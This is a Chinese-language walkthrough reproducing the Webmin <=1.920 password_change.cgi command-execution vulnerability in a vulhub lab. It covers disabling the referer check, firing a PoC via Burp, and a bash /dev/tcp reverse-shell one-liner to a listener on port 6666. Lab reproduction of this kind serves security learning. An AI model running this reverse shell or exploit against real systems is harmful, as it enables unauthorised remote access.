影响范围:webmin <=1.920漏洞复现进入到vuhub之后,就直接执行docker-compose up -d拉取镜像搭建搭建好之后,直接访问192.168.1.1:10000 但是vuhub搭建的网站它是有问题的,所以要根据它报错的提示去修改相当, 所以这里的话,就需要用https去访问,不然会不给访问:https://192.168.1.1:10000/接着就是我们的漏洞利用,访问https://192.168.67.135:10000/password_change.cgi,这样的话,去访问它是会报错的,所以这里我们需要去修改一下配置文件。
接着就是进入后台修改配置文件,这里的话,就直接用docker exec it id号 /bin/bash进入到/etc/webmin目录下,查看config文件。
我们要修改的内容是config中的referers_one=1这个配置。
但是在docker容器中,它是没有编辑器的,所以这里的话,我们需要安装一个vim编辑器cat /etc/os-release先进入容器查看发行版,确定使用yum还是apt安装工具可以看到使用的debian8的 *** 作系统,接下来apt安装, apt install vim接着就是编辑这个文件config,然后将referers_one=1改为referers_one=0接着再去访问那个路径就可以看见,我们这边的页面也发生了相对应的变换,它已经不报错了。
那么接下来的话,就是利用poc复现漏洞,这里的话,要访问https://192.168.1.1:10000/password_change.cgi并且用burp抓包使用网上的poc怼,看到成功执行命令poc如下之后看见效果,很明显的成功执行了命令。
执行一个whoami,它这里也成功的输出相对应的权限那么我们就要反dshell,由于它这里可以执行执行命令,那么我们就可以直接执行bash -c “bash -i >& /dev/tcp/192.168.1.1/6666 0>&1” 接收shell服务器的6666端口)那么的话,执行这个命令,那么我们服务器那边就要监听6666,接收反d回来的shell。
这里的话,需要将payload进一方面的url编码再去执行服务器那边监听6666端口接收反d回来的shell可以看见我们执行的payload,右边的页面一片空白,就说明成功了。
然后就可以看见成功的反d了一个shell过来了。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)